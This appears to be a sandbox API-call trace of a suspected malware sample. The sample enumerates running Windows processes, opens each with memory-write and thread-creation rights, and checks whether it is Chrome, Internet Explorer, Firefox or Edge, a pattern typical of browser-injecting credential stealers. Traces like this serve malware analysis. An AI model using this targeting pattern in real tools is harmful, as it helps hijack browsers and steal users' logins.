	[0209.204] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0209.205] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0209.206] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x3314
	[0209.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.206] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0209.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.206] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.207] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0209.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.207] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.207] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0209.208] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x3318
	[0209.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.208] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0209.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.208] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.209] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0209.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.209] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.209] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0209.210] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x331c
	[0209.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.210] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0209.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.211] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.211] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0209.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.212] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.214] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0209.214] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x3320
	[0209.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.214] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0209.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.215] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.215] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0209.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.215] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.216] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0209.216] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x3324
	[0209.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.216] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0209.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.217] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.217] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0209.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.218] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.218] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0209.218] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3328
	[0209.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.219] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0209.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.219] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.219] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0209.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.220] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.220] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0209.220] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x332c
	[0209.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.221] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0209.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.221] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.221] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0209.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.221] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.222] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0209.222] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3330
	[0209.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.222] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0209.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.223] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.223] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0209.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.223] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.223] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.224] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x3334
	[0209.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.224] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.224] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.225] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.225] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.225] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.226] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x3338
	[0209.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.226] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.226] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.227] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.227] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.227] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.229] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x333c
	[0209.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.233] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.239] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.242] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.243] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.243] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.244] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x3340
	[0209.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.244] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.244] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.245] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.245] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.245] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.246] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x3344
	[0209.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.246] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.246] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.247] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.247] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.247] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.248] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x3348
	[0209.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.248] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.248] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.249] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.249] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.249] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.250] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x334c
	[0209.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.250] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.250] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.250] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.251] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.251] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0209.252] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3350
	[0209.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.252] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0209.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.252] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.252] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0209.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.253] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.253] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.253] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x3354
	[0209.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.254] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.254] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.254] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.255] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.255] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0209.255] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x3358
	[0209.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.255] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.256] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.256] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.256] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.257] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0209.257] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x335c
	[0209.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.257] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0209.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.258] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.258] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0209.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.258] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.259] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.259] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x3360
	[0209.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.259] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.260] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.260] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.260] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.261] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0209.261] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x3364
	[0209.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.262] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0209.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.262] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.262] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0209.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.263] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.263] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0209.264] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x3368
	[0209.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.264] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0209.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.264] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.264] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0209.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.265] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.265] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0209.265] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x336c
	[0209.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.266] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0209.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.266] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.266] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0209.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.266] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.266] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0209.267] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x3370
	[0209.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.267] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0209.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.268] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.268] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0209.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.269] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.269] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0209.270] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0209.270] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0209.271] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x3374
